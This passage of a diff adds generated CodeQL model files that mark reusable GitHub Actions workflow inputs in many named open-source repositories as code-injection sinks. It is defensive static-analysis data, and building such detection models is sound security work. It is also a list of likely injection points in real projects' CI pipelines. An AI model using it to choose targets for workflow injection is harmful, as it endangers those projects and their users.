b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml new file mode 100644 index 000000000000..fdc59aeb23da --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml new file mode 100644 index 000000000000..4b520ea39546 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml new file mode 100644 index 000000000000..f8630968c45f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml new file mode 100644 index 000000000000..4cf11f56fdf6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml new file mode 100644 index 000000000000..44ad4f730764 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml new file mode 100644 index 000000000000..4d7af6469019 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml new file mode 100644 index 000000000000..0f525b146074 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..fc96f1497e01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml new file mode 100644 index 000000000000..a57f0a860696 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml new file mode 100644 index 000000000000..ce86ebf49116 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml new file mode 100644 index 000000000000..05212ab32641 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml new file mode 100644 index 000000000000..6d40d72d019a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..f5ac697360b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml new file mode 100644 index 000000000000..95140465bfc4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml new file mode 100644 index 000000000000..30cf3f54a2fa --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml new file mode 100644 index 000000000000..90937f50a3f1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml new file mode 100644 index 000000000000..ec6a7385187c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml new file mode 100644 index 000000000000..5079e80e7610 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..ccaf2628951d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml new file mode 100644 index 000000000000..56344ff35b64 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml new file mode 100644 index 000000000000..f2b4cd4eff31 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml new file mode 100644 index 000000000000..f38f0d43c4c8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml new file mode 100644 index 000000000000..85e61e866dc0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml new file mode 100644 index 000000000000..9f984f488f7d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml new file mode 100644 index 000000000000..f13f9b871142 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml new file mode 100644 index 000000000000..b021069745f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml new file mode 100644 index 000000000000..dae9a68727e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml new file mode 100644 index 000000000000..4ea3849560dc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml new file mode 100644 index 000000000000..ff4b4ccf353e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml new file mode 100644 index 000000000000..d3649a5ebf33 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml new file mode 100644 index 000000000000..22ff2d5a29be --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml new file mode 100644 index 000000000000..f151d0a2c20f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml new file mode 100644 index 000000000000..e08f9de22977 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml new file mode 100644 index 000000000000..fc009bce95a9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml new file mode 100644 index 000000000000..5e5870c64c7e --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml new file mode 100644 index 000000000000..2262cf5115f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 000000000000..a18ef96e87e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 000000000000..2ea0842c72bc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..65f027175b21 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 000000000000..14c3c8378c6d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", 
